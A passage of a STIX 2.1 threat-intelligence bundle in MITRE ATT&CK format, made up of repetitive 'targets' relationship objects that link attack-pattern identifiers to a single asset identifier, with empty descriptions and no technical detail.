"created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816959", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9e483bd-e9aa-4a4a-a1be-45daad49123e", "created": "2024-07-01T10:37:15.816967", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816969", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c921e33-7549-47a9-90e4-0b34bc36b4d0", "created": "2024-07-01T10:37:15.816977", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816979", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--811ff142-1a6b-491e-b5d8-91463406fff8", "created": "2024-07-01T10:37:15.816987", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816989", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d5591ec-55cc-49cb-a7d7-8c8f5efac299", "created": "2024-07-01T10:37:15.816998", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817000", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--957bb1e7-3446-4ba7-b186-7426ff15db0f", "created": "2024-07-01T10:37:15.817008", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817010", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--326dbfbf-29fc-4e8a-aced-a431296045e4", "created": "2024-07-01T10:37:15.817019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c306b910-5b97-46d6-9a29-8cfd57873540", "created": "2024-07-01T10:37:15.817029", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817031", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--67d46dcc-efb4-4ed2-b5a6-5838603b29c6", "created": "2024-07-01T10:37:15.817039", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817042", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b19c7e48-f463-4b0b-b876-a8a183e2f8dc", "created": "2024-07-01T10:37:15.817050", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817052", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--510002c3-d493-4636-9452-a2eef7c64a88", "created": "2024-07-01T10:37:15.817061", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817063", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de67a5b0-bc44-4b9a-8ac0-3d01dd571d20", "created": "2024-07-01T10:37:15.817071", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817073", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--564c5491-a660-4676-af03-5b8c74477d69", "created": "2024-07-01T10:37:15.817081", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817083", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--04d13b18-93fb-4989-b5eb-4fbb36a46bba", "created": "2024-07-01T10:37:15.817092", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817094", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc876d0e-57d2-4cce-be41-e71214774602", "created": "2024-07-01T10:37:15.817102", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817104", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc158dd0-f50b-4820-8afc-300710e14264", "created": "2024-07-01T10:37:15.817112", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817115", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--886d8d0c-6503-4f11-bf2d-f1e04f5b58f7", "created": "2024-07-01T10:37:15.817123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e28cce2e-28a2-43c8-b500-9f6a54a5142d", "created": "2024-07-01T10:37:15.817133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817136", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40169baf-e8df-449f-8a8d-24ef9aef43ed", "created": "2024-07-01T10:37:15.817144", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817146", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b31f199-2413-4024-86cf-361bea45e946", "created": "2024-07-01T10:37:15.817154", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817156", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--39ef23ca-336c-4006-9382-7900b6567cf7", "created": "2024-07-01T10:37:15.817165", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817167", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c9811746-df9a-46cb-a7ac-ce4140217124", "created": "2024-07-01T10:37:15.817176", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817178", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f46cf9e6-c016-4cc0-8c5d-d6b17b07256d", "created": "2024-07-01T10:37:15.817186", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817188", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d3bbe01-2336-4d9b-b586-94d88d23819e", "created": "2024-07-01T10:37:15.817197", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817199", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ba6236b-197f-480d-9267-25750fe8049f", "created": "2024-07-01T10:37:15.817207", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817209", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f86ea62-cbea-4dc3-a755-4ef338980299", "created": "2024-07-01T10:37:15.817218", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817220", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--624b1955-6fc7-4287-ba50-c3026509601c", "created": "2024-07-01T10:37:15.817228", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817231", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e0b2e14d-e7e1-48c7-90a0-ca22a259ad60", "created": "2024-07-01T10:37:15.817239", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817241", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52d565ed-d07d-45d3-b302-94714ba88986", "created": "2024-07-01T10:37:15.817250", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817252", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60bc163c-b5fe-495c-95c5-26aa7dd1845b", "created": "2024-07-01T10:37:15.817260", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817262", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--946bf117-052a-4eee-8d32-a1fecedcdb0d", "created": "2024-07-01T10:37:15.817270", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817272", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53dad714-129a-4b28-a243-71960455b737", "created": "2024-07-01T10:37:15.817280", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817283", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e569ed38-0c37-478e-82c7-7be423e12a6c", "created": "2024-07-01T10:37:15.817290", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817293", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b40a2fb5-060e-4657-bb70-42b026c02f7e", "created": "2024-07-01T10:37:15.817301", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817303", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57f841eb-14f9-49dc-ba15-a4adc15ec713", "created": "2024-07-01T10:37:15.817312", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817314", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--24a77d0f-5c4c-424f-84e0-1386a330a906", "created": "2024-07-01T10:37:15.817322", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817324", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0b6a9071-b280-448e-9df7-69bc1566a5c4", "created": "2024-07-01T10:37:15.817332", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817334", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c7f6a54-188b-482b-ad56-cc354a58855d", "created": "2024-07-01T10:37:15.817342", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817345", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e9c5fba-4070-4e0c-aad7-05e7bd00b295", "created": "2024-07-01T10:37:15.817353", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817355", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--44b133c1-4848-44d7-8e53-301682e58f7f", "created": "2024-07-01T10:37:15.817363", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817365", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9db5c2e8-3725-465d-8c26-107bcdf0755e", "created": "2024-07-01T10:37:15.817373", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.817375", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92173906-99af-4cbc-96fd-d9e618c304b5", "created": "2024-07-01T10:37:15.817384", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", 